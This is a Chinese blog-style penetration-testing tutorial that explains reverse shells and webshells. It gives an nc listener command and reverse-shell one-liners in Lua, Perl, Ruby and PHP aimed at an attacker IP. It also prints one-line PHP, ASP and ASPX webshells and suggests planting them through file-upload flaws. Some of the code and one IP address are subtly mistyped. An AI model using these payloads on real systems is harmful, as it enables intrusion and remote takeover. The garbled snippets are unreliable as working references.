渗透测试首先要搞定虚拟机和环境问题，虚拟机就不在赘述，网上很多，我也写过，此处以反弹shell为例。

一、什么是反弹shell？

反弹shell (reverse shell)，就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。

reverse shell 与telnet, ssh 等标准 shell 对应，本质上是网络概念的客户端与服务端的角色反转。

二、为什么要反弹shell？

为什么要反弹shell? 
通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip:目标机器端口)，这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet 等等都是正向连接。那么什么情况下正向连接不能用了呢? 
有如下情况:

有如下情况：

• 某客户机中了你的网马，但是它在局域网内，你直接连接不了。
• 目标机器的ip动态改变，你不能持续控制。
• 由于防火墙等限制，对方机器只能发送请求，不能接收请求。
• 对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机等情况都是未知的，所以建立一个服务端让恶意程序主动连接，才是上策。
• 那么反弹就很好理解了，攻击者指定服务端，受害者主机主动连接攻击者的服务端程序，就叫反弹连接。

环境的查看方法是win+R，呼出指令面板，输入cmd，打开命令提示符。

 输入各种环境查询，如果没有，就像这样。

 如果有，就像这样

 

 然后就可以执行各种测试

具体的实验建议分别在一台kali Linux 和一台  C/Linux上做，最好用远程监听工具

                                  我推荐这款                                               无网络，不实验哦

在kali Linux上监听端口命令：nc -lvvp 1111

（端口自己随便改，有不冲突就行）

就像这样

然后在C/Linux上输入各种代码

 lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.227.129','1111');os.execute('/bin/sh -i <&3 >&3 2>&3');"
lua: (command line):1: module 'socket' not found:

反馈：

 perl -e '
use Socket;
$i="192.168.227.129";
$p=1111;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");};'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.227.129","1111");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

php -r '$sock=fsockopen("192.168.277.129",1111);exec("/bin/bash -i <&3 >&3 2>&3");'

诸如此类，反馈也不尽相同

 链接成功，这就是初步的渗透测试。

小马通常指一句话木马，因为其代码量比较小，就是一句简单的代码。以下是几种
脚本类型的一句话木马：
PHP:

<?php @eval($_REQUEST['cmd'];?>

ASP:

<% eval request{"cmd"}%>

ASPX:

<%@ Page Language="jscript"%>

<%eval{Request.ltem["cmd"],"unsafe"};%>

JSP和JSPX的一句话木马比较复杂懒得写了o(*￣︶￣*)o

可利用文件上传漏洞执行一句话木马进而查看IP，下载。。。等操作